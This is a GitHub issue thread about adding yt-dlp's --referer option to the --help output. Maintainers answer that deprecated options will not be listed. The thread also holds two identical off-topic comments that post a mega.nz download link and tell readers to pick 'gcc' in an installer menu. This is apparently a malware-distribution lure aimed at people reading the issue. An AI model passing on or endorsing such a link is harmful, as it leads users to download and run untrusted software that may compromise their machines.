### ISSUE TITLE
add --referer to --help output

### ISSUE THREAD

**Issue by cheater** [yt-dlp/yt-dlp#10845]
### DO NOT REMOVE OR SKIP THE ISSUE TEMPLATE

- [X] I understand that I will be **blocked** if I *intentionally* remove or skip any mandatory\* field

### Checklist

- [X] I'm requesting a feature unrelated to a specific site
- [X] I've looked through the [README](https://github.com/yt-dlp/yt-dlp#readme)
- [X] I've verified that I have **updated yt-dlp to nightly or master** ([update instructions](https://github.com/yt-dlp/yt-dlp#update-channels))
- [X] I've searched [known issues](https://github.com/yt-dlp/yt-dlp/issues/3766) and the [bugtracker](https://github.com/yt-dlp/yt-dlp/issues?q=) for similar issues **including closed ones**. DO NOT post duplicates
- [X] I've read the [guidelines for opening an issue](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#opening-an-issue)

### Provide a description that is worded well enough to be understood

please add --referer to output of --help so that it can be found on windows where there isn't a man command. while it is in the README on github, it requires going to the browser, googling, etc. top google results don't seem useful either.

thank you

### Provide verbose output that clearly demonstrates the problem

- [ ] Run **your** yt-dlp command with **-vU** flag added (`yt-dlp -vU <your command line>`)
- [ ] If using API, add `'verbose': True` to `YoutubeDL` params instead
- [ ] Copy the WHOLE output (starting with `[debug] Command-line config`) and insert it below

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by cheater** [comment]
that is true that it is in the output, but when you open `yt-dlp --help | less` and search using `/referer` then nothing useful shows up. that's why having explicit mention of `--referer` would be useful.

**Comment by coletdjnz** [comment]
https://github.com/yt-dlp/yt-dlp?tab=readme-ov-file#redundant-options options

**Comment by cheater** [comment]
while that's true, as the original report says, we're talking about "windows where there isn't a man command"

**Comment by bashonly** [comment]
Deprecated options will not be added to the `--help` output
